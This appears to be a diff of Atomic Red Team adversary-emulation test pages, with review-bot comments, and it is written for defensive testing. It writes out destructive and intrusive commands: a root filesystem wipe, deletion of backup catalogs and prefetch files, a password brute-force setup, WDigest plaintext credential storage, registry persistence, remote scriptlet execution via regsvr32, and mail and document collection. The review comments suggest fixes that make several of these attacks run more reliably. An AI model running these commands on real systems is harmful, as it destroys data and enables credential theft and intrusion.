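Review bot: any cleanup added for this test has to restore both settings, not just one: `bcdedit /set {default} recoveryenabled yes` and `bcdedit /set {default} bootstatuspolicy displayallfailures` (the default policy value), since `ignoreallfailures` together with `recoveryenabled no` leaves the machine unable to enter recovery on the next failed boot if only one of them is reverted.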
@@ -226,29 +266,37 @@ This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux, CentOS, Ubuntu
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
<br/>
<br/>
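Review bot: the heading `Attack Commands: Run with bash!` is missing the `Elevation Required (e.g. root or admin)` tag that the other destructive tests in this file carry, although `rm -rf / --no-preserve-root` only does what the description says when run as root. The `> /dev/null 2> /dev/null` redirection also hides the permission errors that would otherwise show the test ran unprivileged; dropping the stderr redirect would make a non-root run obvious.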
@@ -258,11 +306,15 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
```
<br/>
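Review bot: `(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]` misbehaves at both edges: with exactly one .pf file `-Name` returns a single string and `[0]` yields its first character, so `Join-Path` builds a one-letter path and `Remove-Item` fails; with no .pf files `[0]` is `$null` and `Join-Path` throws. Wrap the call in `@(...)` to force an array and guard the empty case before calling `Remove-Item`.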
+1 -2
@@ -153,8 +153,7 @@ atomic_tests:
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- linux
- centos
- ubuntu
executor:
name: bash
command: |
+6 -2
@@ -41,7 +41,7 @@ Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
@@ -49,7 +49,8 @@ Creates username and password files then attempts to brute force on remote host
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
@@ -60,4 +61,7 @@ echo "Password!" >> #{input_file_passwords}
<br/>
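Review bot: the `remote_host` description reads "Hostname of the target system" but the default `\\COMPANYDC1\IPC$` is a UNC share path, so one of the two should change to match the other. The test also writes `#{input_file_users}` (real domain user names from `net user /domain`) and `#{input_file_passwords}` into the working directory; unless the added lines at the end of the test delete both files, a cleanup step should.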
+30 -10
@@ -29,17 +29,21 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
<br/>
<br/>
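Review bot: the `Elevation Required` tag on this test is wrong: `reg add HKEY_CURRENT_USER\...\Advanced /v HideFileExt` writes the current user's own hive and needs no admin rights, so the tag should be dropped (the HKLM test below keeps it). The description in the hunk header also reads "cia cmd console" where "via cmd console" is meant.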
@@ -50,17 +54,21 @@ CMD is ran as Administrative rights.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
#### Cleanup Commands:
```
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
<br/>
<br/>
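Review bot: `/d {some_other_executable}` is a literal placeholder, not a declared `#{...}` input, so as written the test registers a Run value that points at a nonexistent program. Turn it into an input with an inert default such as `C:\Windows\System32\calc.exe` and document it in an Inputs table like the other tests in this file.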
@@ -70,7 +78,8 @@ Modify a registry key of each user profile not currently loaded on the machine u
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
@@ -128,6 +137,9 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
<br/>
@@ -137,17 +149,21 @@ Sets registry key that will tell windows to store plaintext passwords (making th
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
<br/>
<br/>
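Review bot: the cleanup sets `UseLogonCredential` to 0 instead of removing it; on Windows 8.1 / Server 2012 R2 and later the value does not exist by default and its absence already means "disabled", so `reg delete HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /f` restores the original state without leaving a registry artifact behind.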
@@ -157,14 +173,15 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -173,10 +190,13 @@ $EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
```
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
<br/>
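Review bot: the cleanup line `Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}` repeats `-Path`, which PowerShell rejects at parameter binding, so the stored value is never removed; delete the duplicate. Quoting the `-Path` and `-Name` arguments in both `Set-ItemProperty` and `Remove-ItemProperty` would also keep them working when a user supplies a key path containing spaces.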
+24 -8
@@ -29,18 +29,22 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
screencapture
```
<br/>
<br/>
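Review bot: the `output_file` input (default `desktop.png`) is declared but the command `screencapture` never uses it, so there is no predictable file to verify or clean up; it should read `screencapture #{output_file}` here and `screencapture -x #{output_file}` in the next test.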
@@ -50,18 +54,22 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
screencapture -x
```
<br/>
<br/>
@@ -71,12 +79,13 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.xwd|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
xwd -root -out #{output_file}
xwud -in #{output_file}
@@ -84,6 +93,9 @@ xwud -in #{output_file}
<br/>
<br/>
@@ -93,16 +105,20 @@ Use import command to collect a full desktop screenshot
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
import -window root
```
<br/>
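Review bot: `import -window root` is missing its output argument; ImageMagick's `import` requires an output filename and the declared `output_file` input (default `desktop.png`) exists for exactly that: `import -window root #{output_file}`.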
+7 -3
@@ -25,20 +25,24 @@ Search through local Outlook installation, extract mail, compress the contents,
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | String | $home\desktop\mail.csv|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
```
#### Cleanup Commands:
```
del #{output_file}
```
<br/>
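Review bot: the cleanup `del #{output_file}` runs under `command_prompt`, where the default `$home\desktop\mail.csv` is not expanded (cmd.exe does not know `$home`), so the exported mailbox CSV is left on the desktop. Either change the default to `%USERPROFILE%\desktop\mail.csv` or run the cleanup through `powershell -command Remove-Item ...`, as the attack command already does for the script itself.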
+11 -3
@@ -25,19 +25,23 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```
#### Cleanup Commands:
```
del %temp%\T1115.txt
```
<br/>
<br/>
@@ -47,7 +51,8 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
echo Get-Process | clip
iex Get-Clipboard
@@ -55,4 +60,7 @@ iex Get-Clipboard
<br/>
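Review bot: `iex Get-Clipboard` does not execute the clipboard contents: Invoke-Expression receives the literal string `Get-Clipboard`, runs that cmdlet, and simply returns the text `Get-Process` as output. To run what was copied use `Get-Clipboard | iex` or `iex (Get-Clipboard)`; note `Get-Clipboard` needs PowerShell 5.0 or later.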
+18 -6
@@ -25,18 +25,22 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1117\RegSvr32.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
```
<br/>
<br/>
@@ -46,18 +50,22 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
<br/>
<br/>
@@ -67,16 +75,20 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
<br/>
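Review bot: the whole command is wrapped in an extra pair of double quotes, so cmd.exe treats `"IF "` as the program name and fails with "not recognized"; remove the outer quotes so the line starts with `IF "%PROCESSOR_ARCHITECTURE%"=="AMD64"`. The branch logic itself is right for an x86 DLL: `C:\Windows\syswow64\regsvr32.exe` on 64-bit hosts, the native `regsvr32.exe` otherwise.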
+12 -4
@@ -19,13 +19,14 @@ Executes the Uninstall Method
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | location of the payload | Path | PathToAtomicsFolder\T1118\src\T1118.dll|
| source | location of the source code to compile | Path | PathToAtomicsFolder\T1118\src\T1118.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#(unknown) #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #(unknown)
@@ -33,6 +34,9 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToCo
<br/>
<br/>
@@ -42,13 +46,14 @@ Executes the Uninstall Method
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | location of the payload | Path | PathToAtomicsFolder\T1118\src\T1118.dll|
| source | location of the source code to compile | Path | PathToAtomicsFolder\T1118\src\T1118.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#(unknown) #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown)
@@ -56,4 +61,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown)
<br/>
+22 -6
@@ -23,7 +23,8 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
@@ -31,6 +32,9 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
<br/>
<br/>
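Review bot: `copy %f c:\temp\` breaks on any document path containing a space (most profile paths do) and nothing creates `c:\temp`; use `copy "%f" c:\temp\` and add `mkdir c:\temp` (or a prerequisite step) first. The preceding `dir c: /b /s .docx | findstr /e .docx` walks the entire volume, which takes minutes on a real host and is worth stating in the description.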
@@ -40,13 +44,17 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
<br/>
<br/>
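Review bot: `Get-ChildItem -Recurse -Include *.doc` has no `-Path`, so it only searches below the current working directory, and `Copy-Item ... -destination c:\temp` fails if that folder does not exist; give it an explicit `-Path` (e.g. `$env:USERPROFILE`) and create `c:\temp` first so the test behaves the same wherever it is launched from.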
@@ -56,14 +64,14 @@ collect information for exfiltration
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-Service > $env:TEMP\T1119_1.txt
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
```
#### Cleanup Commands:
```
Remove-Item $env:TEMP\T1119_1.txt
@@ -71,6 +79,10 @@ Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
```
<br/>
<br/>
@@ -80,7 +92,8 @@ collect information for exfiltration
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
@@ -88,7 +101,6 @@ wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
```
#### Cleanup Commands:
```
del %TEMP%\T1119_1.txt
@@ -97,4 +109,8 @@ del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
```
<br/>
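Review bot: `tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt` hard-codes the install location while the other tests in this PR use the `PathToAtomicsFolder` placeholder; switch to it so the test works from a non-default checkout.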
+14 -6
@@ -19,24 +19,28 @@ Executes the Uninstall Method, No Admin Rights Required
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
```
#### Cleanup Commands:
```
del #{file_name}
```
<br/>
<br/>
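Review bot: `csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}` has no `/out:`, so the compiler names the output after the source file and writes it to the current directory; that only lines up with the `file_name` default `T1121.dll` when the test happens to run from that directory. Add `/out:#{file_name}` so `regasm.exe /U #{file_name}` and the cleanup `del #{file_name}` operate on the file that was actually built.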
@@ -46,13 +50,14 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
@@ -61,11 +66,14 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServic
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
```
#### Cleanup Commands:
```
del #{file_name}
del key.snk
```
<br/>

Some files were not shown because too many files have changed in this diff.